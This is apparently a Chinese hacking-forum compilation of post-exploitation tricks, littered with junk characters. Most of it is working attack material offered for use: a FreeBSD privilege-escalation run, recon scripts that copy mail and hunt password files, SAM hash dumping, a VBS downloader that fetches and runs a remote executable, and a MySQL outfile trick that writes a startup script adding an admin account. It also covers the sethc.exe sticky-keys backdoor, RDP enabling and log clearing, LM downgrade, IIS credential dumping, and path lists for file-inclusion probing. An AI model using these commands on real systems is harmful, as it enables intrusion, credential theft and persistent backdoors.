八.freebsd本地提权
8 x% i5 U# l& h% N[argp@julius ~]$ uname -rsi
2 c, W! _3 }) T1 e* \  M0 H* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
: o+ l4 a, }0 P. Z& k* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
, h$ \) C( R% s; R5 p. x' J* [argp@julius ~]$ ./nfs_mount_ex
*
calling nmount()
) X# [0 J' r6 ?% r; {, Y+ b# `
（注：本文原件由0x童鞋收集整理，感谢0x童鞋，本人补充和优化了点，本文毫无逻辑可言，因为是想到什么就写了，大家见谅）
0 x( E' s; K8 E6 B- h/ |——————————————
感谢T00LS的童鞋们踊跃交流，让我学到许多经验，为了方便其他童鞋浏览，将T00LS的童鞋们补充的贴在下面，同时我也会以后将自己的一些想法跟新在后面。
————————————————————————————
1、tar打包            tar -cvf /home/public_html/*.tar /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
alzip打包(韩国) alzip -a D:\WEB\ d:\web\*.rar
' s6 q8 ^* V2 {{
注：
关于tar的打包方式,linux不以扩展名来决定文件类型。
3 O' d% R! J# d& o5 e. J4 J  @7 c若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压
那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*
}  
  f$ R7 |4 D  x/ m( X$ a4 N! [
提权先执行systeminfo
token 漏洞补丁号 KB956572
Churrasco          kb952004
' l8 R+ A) L! F( n命令行RAR打包~~·
rar a -k -r -s -m3 c:\1.rar c:\folder
% [. n6 _7 `" ~4 X——————————————
/ e5 S) O& i+ e2、收集系统信息的脚本  
for window：
4 b' U3 i  E- q$ T. c8 t/ q
@echo off
/ ]: H% n' H8 N% g* x+ Jecho #########system info collection
systeminfo
1 Q: B4 k. |, o9 Z+ c* qver
hostname
' G9 A3 a) A- l; j4 onet user
net localgroup
( w2 r& E+ K9 n) x6 k* Xnet localgroup administrators
( g+ ]4 i+ E6 U+ e& i" Anet user guest
7 j+ I# y9 J( J2 z# Dnet user administrator
6 I- D1 E# k; |" y+ P: F2 a
/ n& O4 i% z8 J% @0 W1 f8 Kecho #######at- with   atq#####
- Y" O* h! u# F% i# ~echo schtask /query

echo
) Z1 Q7 z  [, Q0 mecho ####task-list#############
7 o( t% C+ @' P( Y+ \tasklist /svc
( y7 ~" Q- E% j6 Fecho
echo ####net-work infomation
: `" i( r$ Z* N" i+ W6 R4 y) Bipconfig/all
) D8 r* D  j: j6 u1 m3 groute print
- A6 R& L7 Y8 Zarp -a
netstat -anipconfig /displaydns
5 j9 H: W* E4 x5 l9 gecho
( |$ R$ I2 e3 l7 [' Qecho #######service############
1 |" u7 c7 P* P3 Q0 Usc query type= service state= all
/ C; \: N, ^" d. A  z8 vecho #######file-##############
cd \
tree -F
. v* E4 ]) a* c7 kfor linux：
' v; L% J' L% M- u6 X
#!/bin/bash
+ \, Z9 C5 b, T
echo #######geting sysinfo####
echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
echo #######basic infomation##
, h: z# Y$ R  ^cat /proc/meminfo
# g8 v* ?% R3 A* x7 }echo
cat /proc/cpuinfo
- d  h% k# o  m! [1 V4 t  secho
rpm -qa 2>/dev/null
######stole the mail......######
cp -a /var/mail /tmp/getmail 2>/dev/null
; O6 a% F( Q2 y7 y+ s5 e9 E" H! L0 L
% \2 Q; x7 ?. \. n/ y+ h
echo 'u'r id is' `id`
echo ###atq&crontab#####
atq
crontab -l
echo #####about var#####
set

echo #####about network###
, V8 @2 M1 y9 w& z####this is then point in pentest,but i am a new bird,so u need to add some in it
cat /etc/hosts
. ^8 ]$ G* S/ |. Rhostname
ipconfig -a
* Y% P# d" T3 ?) N4 n3 iarp -v
echo ########user####
cat /etc/passwd|grep -i sh

echo ######service####
% O" }) o4 |  t+ \( E+ x0 ichkconfig --list
; h4 s# M1 r& {. b
9 ^! ?) C& }/ \! u+ _for i in {oracle,mysql,tomcat,samba,apache,ftp}
: S0 ^/ M/ q" O6 v2 B: A! z- wcat /etc/passwd|grep -i $i
, v9 f! M' {" w7 g& Fdone
% b4 i- A/ _& d6 G/ [) i
& b- w3 K4 t  Z+ ?5 V: A' Wlocate passwd >/tmp/password 2>/dev/null
sleep 5
- B0 [" q' Z$ }0 x4 B/ Tlocate password >>/tmp/password 2>/dev/null
sleep 5
, B, r0 |" X6 r8 r8 a: j$ Wlocate conf >/tmp/sysconfig 2>dev/null
, N" g# {2 P1 V3 Csleep 5
locate config >>/tmp/sysconfig 2>/dev/null
sleep 5

###maybe can use "tree /"###
echo ##packing up#########
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
9 }, I' Q) Y. R+ \& t) a5 P- Rrm -rf /tmp/getmail /tmp/password /tmp/sysconfig
) K9 t4 @7 ?8 H# ~2 G9 X——————————————
3、ethash 不免杀怎么获取本机hash。
首先导出注册表 regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"   （2000）
               reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg  （2003）
$ k& }( A/ X, X( |- C! ?1 d# t  O注意权限问题，一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问（界面登录的需要注意，system权限可以忽略）
4 u6 |) R5 g+ b" n9 z8 x" e( ^接下来就简单了，把导出的注册表，down 到本机，修改注册表头导入本机，然后用抓去hash的工具抓本地用户就OK了
hash 抓完了记得把自己的账户密码改过来哦！
据我所知，某人是用这个方法虚拟机多次因为不知道密码而进不去！~
——————————————
4、vbs 下载者
1
/ l& z5 ~  k& i3 r6 D& lecho Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
5 k. ?1 F# ]( m' {; K8 k; g; l# Secho Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs

2
On Error Resume Nextim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))  
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
, x, k; K0 Q. wSet sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
3 ~) |, v5 B; ysGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
) t0 @. J+ g9 [6 `5 d% T
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe

当GetHashes获取不到hash时，可以用兵刃把sam复制到桌面
——————————————————
5、
1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.开启XP&2003终端服务
7 Q- P( E! p, G5 A0 @# rREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5 ]9 p6 h5 {2 y) M) }3.更改终端端口为2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制
" _- p; u" ]: J/ l: sREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled   xpsp2res.dll,-22009 /f
$ o! q$ T; u. f2 f/ }————————————————
$ ~4 K! E9 n8 }8 M, A9 o6 G( G6、create table a (cmd text);
9 Z/ ]5 O; U& @# Z+ Z5 F% Qinsert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");  
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
————————————————————
8 s3 _6 }4 ?" N% g6 q7、BS马的PortMap功能，类似LCX做转发。若果支持ASPX，用这个转发会隐蔽点。（注：一直忽略了在偏僻角落的那个功能）
5 D# Z9 _% l. P4 x, X_____
- P0 @' ^. ^  X8、for /d %i in (d:\freehost\*) do @echo %i

; o1 r9 R1 b$ u) N2 i( X" S列出d的所有目录
1 P1 n; r- U) L3 D5 V  
$ O& b1 f: l7 k$ }" ^' o  for /d %i in (???) do @echo %i
( i3 V6 X, }& \; M! T$ n
2 x4 B1 Q4 x9 G把当前路径下文件夹的名字只有1-3个字母的打出来

2.for /r %i in (*.exe) do @echo %i
  
% ~4 V3 L3 a% p; Q$ Y6 P以当前目录为搜索路径.会把目录与下面的子目录的全部EXE文件列出
$ h) E) t  y+ A& _* ?; w- K9 i; A
for /r f:\freehost\hmadesign\web\ %i in (*.*) do @echo %i

3.for /f %i in (c:\1.txt) do echo %i
  
  //这个会显示a.txt里面的内容，因为/f的作用，会读出a.txt中
6 S' i$ k! k! @& ^
4.for /f "tokens=2 delims= " %i in (a.txt) do echo %i

  delims=后的空格是分隔符 tokens是取第几个位置
6 C' C. R% q4 K7 J' M——————————
●注册表:
% t+ @7 C9 D2 b5 x& l3 l0 V5 x0 {1.Administrator注册表备份:
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1f4.reg
/ E) Q* A4 s) C- P! p2 p
2.修改3389的默认端口:
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
7 f* d/ \: O  |  ]修改PortNumber.

: ^( l4 \; d$ _6 n9 F) t- b3.清除3389登录记录:
reg delete "HKCU\Software\Microsoft\Terminal Server Client"  /f
. N! S" X7 O5 W0 X& X" ^
5 |% U1 v6 \$ U6 ~+ R; h; U4 ?" b4.Radmin密码:
) ?6 Y: F, M3 E8 Y! ~: {reg export HKLM\SYSTEM\RAdmin c:\a.reg

5.禁用TCP/IP端口筛选(需重启):
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

6.IPSec默认免除项88端口(需重启):
: A! m$ F* R4 r, g2 yreg add HKLM\SYSTEM\CurrentControlSet\Services\IPSEC /v NoDefaultExempt /t REG_DWORD /d 0 /f
- q! B( u% N: t& w5 X或者
7 {- f2 u7 j) L2 s; ]8 }netsh ipsec dynamic set config ipsecexempt value=0
: i! D4 R' U1 j  T7 V( \& w7 q
7.停止指派策略"myipsec":
netsh ipsec static set policy name="myipsec" assign=n
9 I, T, H* q) t3 R
8.系统口令恢复LM加密:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LMCompatibilityLevel /t REG_DWORD /d 0 /f

9.另类方法抓系统密码HASH
reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
reg save hklm\security c:\security.hive
; |* t* n. h3 W/ L  _1 [
10.shift映像劫持
& @& Z7 n+ o! g% A4 M  M0 E% hreg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d cmd.exe
7 `& D2 V3 B/ H4 D, X
$ |( q% W; L. P9 Yreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
7 K' o$ s% s/ r- k2 h0 C: ~* p; q-----------------------------------
星外vbs(注：测试通过，好东西）
$ u4 H7 R5 Z0 k# A9 N' S0 hSet ObjService=GetObject("IIS://LocalHost/W3SVC")
3 f* K3 e; C( C8 [6 I0 I  E( g; IFor Each obj3w In objservice
$ K& B: l% Q( o! \1 T& QchildObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
if IsNumeric(childObjectName)=true then
set IIs=objservice.GetObject("IIsWebServer",childObjectName)
7 d6 _+ ^! n2 \: i3 Mif err.number<>0 then
exit for
msgbox("error!")
  `3 {, U) ^# G# c( B2 A9 Nwscript.quit
& ^; e* C! l0 Y4 R* ^8 p% [5 E) dend if
. W; ~/ \. u7 s$ ~0 Pserverbindings=IIS.serverBindings
) M8 Q& b) v$ R7 V+ h" E! b% cServerComment=iis.servercomment
% t& v- A' V  \6 o& M. H% fset IISweb=iis.getobject("IIsWebVirtualDir","Root")
0 U2 x/ _) t  U* \4 j8 F( Ouser=iisweb.AnonymousUserName
2 T8 Z3 _, R2 s, c0 ~1 s7 A: _pass=iisweb.AnonymousUserPass
6 y' K4 k+ C9 i3 b3 d7 Opath=IIsWeb.path
list=list&servercomment&" "&user&" "&pass&" "&join(serverBindings,",")&" "&path& vbCrLf & vbCrLf
# t1 l* V! z0 j" lend if
Next
wscript.echo list
Set ObjService=Nothing
7 l: }) F7 E. Z6 g- ?! R( }% |- }wscript.echo "from : http://www.xxx.com/" &vbTab&vbCrLf
. _7 X! Y8 c. I8 t& Z& V* kWScript.Quit
复制代码
----------------------2011新气象，欢迎各位补充、指正、优化。----------------
$ Z/ J/ L! e' }9 r+ y. L% d2 k: y1、Firefox的利用(主要用于内网渗透），火狐浏览器的密码储存在C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\文件夹，打包后，本地查看。或有很多惊喜~
2、win2k的htt提权（注：仅适合2k以及以下版本，文件夹不限,只读权限即可)
5 |7 q# [+ k. k6 U; [  S将folder.htt文件，加入以下代码：
<OBJECT ID=RUNIT WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="cmd.exe">
' J" p$ {2 a! f* X</OBJECT>
复制代码
$ a5 T: D+ e; H$ }9 r- v然后与desktop.ini、cmd.exe同一个文件夹。当管理打开该文件夹时即可运行。
# O# x9 ^+ I7 z) u9 S7 XPS：我N年前在邪八讨论过XP下htt提权，由于N年前happy蠕虫的缘故，2K以后都没有folder.htt文件，但是xp下的htt自运行各位大牛给个力~
, z3 [2 K% `' sasp代码，利用的时候会出现登录问题
原因是ASP大马里有这样的代码：（没有就没事儿了）
0 n' H& u4 }; C2 _ url=request.severvariables("url")
这里显示接收到的参数是通过URL来传递的，也就是说登录大马的时候服务器会解析b.asp，于是就出现了问题。
解决方法
) H4 w3 U" J7 h3 X  }5 z$ o  {0 h! y7 b url=request.severvariables("path_info")
path_info可以直接呈现虚拟路径 顺利解析gif大马
) R: R9 K( L7 i
* c7 S% a+ H5 X+ B$ k$ K==============================================================
LINUX常见路径：

# B" c  y; Y# u, B$ Q) n  S/ r/etc/passwd
/etc/shadow
: c* R8 J7 _* y  Y" ~. _/etc/fstab
/etc/host.conf
: c! b  \* S8 T  Y3 P/etc/motd
/ f7 y; }) n9 i" T/ [' O. i/etc/ld.so.conf
' k" `; V% q. N, l( r/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
: @% F+ |2 I+ Z$ o/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
* Z, y) `/ _/ a$ Z+ x/var/httpd/conf/php.ini
/var/www/index.html
# N& _2 I% z$ N8 Y) R+ w4 B# E$ l' S/var/www/index.php
0 E5 X, B6 ~* C  s  }- F/opt/www/conf/httpd.conf
+ e. J. e  V* h( C2 B$ `# ~0 L- b/opt/www/htdocs/index.php
7 E1 F3 ^5 _9 T5 E# Q* F" q/opt/www/htdocs/index.html
$ F7 Q8 I: F8 N/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
6 F- {% X6 i- q  ~" t$ V  G4 K/usr/local/apache2/htdocs/index.html
  s! `& [% `& j7 m+ ?/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
% b! @3 u6 i$ @2 w3 U2 W! ?( F. l/usr/local/httpd2.2/htdocs/index.html
  k( h* E8 r0 D/ K- p, g/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
' D- X' {. b# J4 l. S/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
2 s4 @$ J3 x# N1 J2 S/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
+ L0 C' R1 m9 [7 d% _9 |/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
$ V7 ]/ n9 I8 f$ V) o/usr/local/httpd/conf/httpd.conf
0 p3 Z, j7 D' j+ T3 ?- x# ^6 G* A; c/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
, L. |6 x! r) \1 @, R: Z$ f: h; F/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
, C' z' {0 ?, a, c" b: T/etc/apache2/sites-available/default
3 m1 W1 }8 I$ K/etc/phpmyadmin/config.inc.php
' A( l  V- t% W. X! x/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
4 A. t! x9 [0 Q4 K' W1 c+ r/etc/httpd/logs/error.log
9 q/ I9 g7 {1 Y6 w' p8 g2 l) L/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
  @+ k' o* R& j: P1 ^! n/var/log/apache/error.log
" c4 ~4 G* X5 Y. Z! ~0 G/var/log/apache/access_log
/var/log/apache/access.log
) _3 k3 `$ ~% k6 u5 Z! H/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
' U2 j3 @) n: W1 M2 N$ h/var/log/apache2/access.log
/var/www/logs/error_log
; X. w2 t! F5 a2 s2 N8 i3 f/var/www/logs/error.log
/var/www/logs/access_log
& J# s& N( O& j5 U" ]3 Q/var/www/logs/access.log
% n# a% ]8 t" A* L: h/usr/local/apache/logs/error_log
) X3 I, S$ Z$ J/ b, E, L/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
9 Y& r' a6 \2 l2 ]& O4 W( {/var/log/error.log
/var/log/access_log
# G9 s  G2 y( O3 x3 |: n$ H/var/log/access.log
/usr/local/apache/logs/access_logaccess_log.old
5 y- d7 `- _0 y& L3 f/usr/local/apache/logs/error_logerror_log.old
/etc/php.ini
) @" n! @  `' @: @$ ^/bin/php.ini
/etc/init.d/httpd
, _  q% a8 x. N2 G/ ~' T4 d/etc/init.d/mysql
! ~( b( i1 }+ O: E  Y% P8 W/etc/httpd/php.ini
' G  t  J3 {  B) }/usr/lib/php.ini
/ [0 r$ U6 A7 |8 J5 I' Y8 q2 r/usr/lib/php/php.ini
# q4 S( i* Q% }, ]: R( s/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
- T$ m/ G9 W. l- _- L9 Z/usr/local/php4/php.ini
# J3 j1 k! c) X! N' m& c/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
# H3 f" \: o) ]; o! g* W, S/usr/local/php5/etc/php.ini
; X& t9 h. D7 B0 Z2 ]/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
7 H7 l( d) S# e# T( V/usr/local/apache/conf/httpd.conf
3 F/ y+ u( P3 p3 t4 i4 n/usr/local/apache2/conf/httpd.conf
5 ]2 d, ?  E- a0 g/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
$ V/ b2 g. [: L$ V/etc/php4/apache/php.ini
- g0 X' o2 {: q  T# m2 h/etc/php4/apache2/php.ini
6 z' d  w1 q- n/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
# `# w/ E1 {( p( Y0 A/etc/php/apache/php.ini
& J5 ?' {) H, q9 y5 r6 B" ^% f/etc/php/apache2/php.ini
/web/conf/php.ini
4 a1 e! L- P) E. I& E/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
3 q# p% V+ \7 D5 c: ~/var/local/www/conf/httpd.conf
( ]2 Z2 c7 R+ h/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
$ N) R  p; A2 l! F7 m4 ?6 N/php5/php.ini
/php4/php.ini
/php/php.ini
0 H- m% t/ r. D8 ?+ m5 N# @) c/PHP/php.ini
/apache/php/php.ini
6 d5 W$ M$ i( q2 r& u/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
" z2 {# E' ]1 d5 p7 C% p/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
8 X$ k6 J) y& ^& F5 J5 t& T/home/bin/stable/apache/php.ini
$ l/ ?: D9 R# r/var/log/mysql/mysql-bin.log
! q) i/ K! s7 d3 g2 d* E/var/log/mysql.log
0 u1 H( A2 @1 N3 ?- D/var/log/mysqlderror.log
/var/log/mysql/mysql.log
6 f9 z; u9 c& V, z, w/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
6 i: P4 }# z/ Y" h# }9 d- P2 Z/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
% f% F0 l4 j, u; v) R/usr/local/cpanel/logs/license_log
, T5 J+ }, X4 z! \  n' h( u3 d/usr/local/cpanel/logs/login_log
! {! C2 v0 ~2 ^5 U' f$ ^/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini

2..windows常见路径（可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘）

) C# v! w: n5 M7 d3 rc:\windows\php.ini
' o) |4 M) F  G8 C" c5 Y0 ^c:\boot.ini
c:\1.txt
c:\a.txt

c:\CMailServer\config.ini
c:\CMailServer\CMailServer.exe
9 C; M: |/ U6 u" }  ~8 qc:\CMailServer\WebMail\index.asp
2 h8 R* k* U, R# wc:\program files\CMailServer\CMailServer.exe
c:\program files\CMailServer\WebMail\index.asp
C:\WinWebMail\SysInfo.ini
3 ^8 d2 y4 H6 [2 p- _: T+ q8 F7 xC:\WinWebMail\Web\default.asp
C:\WINDOWS\FreeHost32.dll
' F0 P; ~8 t1 j% OC:\WINDOWS\7i24iislog4.exe
9 }9 t: k' p8 oC:\WINDOWS\7i24tool.exe

c:\hzhost\databases\url.asp

c:\hzhost\hzclient.exe
8 d2 ~8 D% p5 k, c! V/ }/ UC:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
, E& C2 ~% x( O, r
( p4 T( |0 y5 q! N% \3 V+ d+ }' q6 j1 NC:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
, }7 G  y. F1 U7 j: S7 x; s2 mC:\WINDOWS\web.config
$ N) [$ @( Q. {2 R$ e, y  Oc:\web\index.html
6 T- P& {$ `) @0 F' `- g# Sc:\www\index.html
. X. _3 L7 A* A6 N1 t+ e( y( Sc:\WWWROOT\index.html
c:\website\index.html
: l! {+ J" r+ N6 xc:\web\index.asp
c:\www\index.asp
c:\wwwsite\index.asp
c:\WWWROOT\index.asp
c:\web\index.php
1 F4 I' _$ Q+ g" A( tc:\www\index.php
c:\WWWROOT\index.php
c:\WWWsite\index.php
c:\web\default.html
2 v' H7 _2 a/ n! G" i% k6 mc:\www\default.html
c:\WWWROOT\default.html
c:\website\default.html
c:\web\default.asp
c:\www\default.asp
* J7 y- J$ K* vc:\wwwsite\default.asp
; y' q+ x0 {6 L* w; Ic:\WWWROOT\default.asp
/ q+ N. M! [5 Q9 _; C8 p& uc:\web\default.php
6 Z& Q$ M$ @  gc:\www\default.php
; W5 j2 f/ H6 Z6 Y4 q. Wc:\WWWROOT\default.php
. M# r' B) A( H; ?/ Gc:\WWWsite\default.php
C:\Inetpub\wwwroot\pagerror.gif
c:\windows\notepad.exe
c:\winnt\notepad.exe
5 ]$ a5 q- ~" y% u: U6 [5 o+ ]C:\Program Files\Microsoft Office\OFFICE10\winword.exe
  _6 P( O" U4 e0 c) AC:\Program Files\Microsoft Office\OFFICE11\winword.exe
8 v1 U9 x* T1 |3 W+ n4 I! kC:\Program Files\Microsoft Office\OFFICE12\winword.exe
2 y  l8 d; E" p0 g; i& H# sC:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\winrar\rar.exe
! l! h& {5 ^9 nC:\Program Files\360\360Safe\360safe.exe
C:\Program Files\360Safe\360safe.exe
C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
c:\ravbin\store.ini
c:\rising.ini
' H4 H, o) P# m) ~7 j" tC:\Program Files\Rising\Rav\RsTask.xml
C:\Documents and Settings\All Users\Start Menu\desktop.ini
* L# |% |* T. {  s. A3 w( pC:\Documents and Settings\Administrator\My Documents\Default.rdp
C:\Documents and Settings\Administrator\Cookies\index.dat
C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
C:\Documents and Settings\Administrator\My Documents\1.txt
! h- ^7 ~# h5 zC:\Documents and Settings\Administrator\桌面\1.txt
C:\Documents and Settings\Administrator\My Documents\a.txt
C:\Documents and Settings\Administrator\桌面\a.txt
( O, x( O. v7 Z3 |0 c4 {9 C* YC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
4 Y0 J, f* r' q" n- xE:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
3 a" f( c+ r+ U5 n6 m; kC:\Program Files\RhinoSoft.com\Serv-U\Version.txt
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
C:\Program Files\Symantec\SYMEVENT.INF
1 k% s% o+ s0 s7 s+ a) p/ Y' ]7 uC:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
7 _, V8 T( \/ c3 M' Y0 [C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
. h: ]7 |8 ^5 g' b& i/ vC:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
3 \9 ~. F( K4 P& T& `0 IC:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
0 d( x9 C( b3 _5 x/ @6 f- G  cC:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
( C5 e. @- b2 D1 K/ r& {  H2 aC:\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
% Q1 T  {$ W! e( mC:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
C:\Program Files\MySQL\MySQL Server 5.0\COPYING
C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
% V2 W7 O8 P( L- |7 t  c1 JC:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
' [3 Z' Y& u( G( N5 @c:\MySQL\MySQL Server 4.1\bin\mysql.exe
; H" [( ?. O( @( \2 \+ R) e# Cc:\MySQL\MySQL Server 4.1\data\mysql\user.frm
0 R1 \0 C3 @6 d5 m6 B4 kC:\Program Files\Oracle\oraconfig\Lpk.dll
$ Z) N9 n7 [" y' C- \. RC:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
  G7 q0 A/ U! ~- _* x% c& v* wC:\WINDOWS\system32\inetsrv\w3wp.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
9 i' u& F- V7 M7 _* jC:\WINDOWS\system32\inetsrv\MetaBase.xml
C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
C:\WINDOWS\system32\config\default.LOG
5 C9 `% u- @1 S$ g$ qC:\WINDOWS\system32\config\sam
4 t" z0 h$ |+ w3 j4 iC:\WINDOWS\system32\config\system
( s- \: B% m  A* uc:\CMailServer\config.ini
c:\program files\CMailServer\config.ini
c:\tomcat6\tomcat6\bin\version.sh
c:\tomcat6\bin\version.sh
4 Y7 z( h! a. w: Z/ t0 H- R! y% H: Jc:\tomcat\bin\version.sh
c:\program files\tomcat6\bin\version.sh
* Q  g3 I) a+ Y4 VC:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
8 C8 w& |* O, g2 m  o: M, ^8 Kc:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
$ y1 j: Q4 `: N$ X+ B( \% Dc:\Apache2\Apache2\bin\Apache.exe
9 i+ n6 @% j& F; m1 ^c:\Apache2\bin\Apache.exe
/ x  e" j. `! P  T5 K# Q4 zc:\Apache2\php\license.txt
1 P; K# l1 L4 o! E3 Z+ |& N" pC:\Program Files\Apache Group\Apache2\bin\Apache.exe
/usr/local/tomcat5527/bin/version.sh
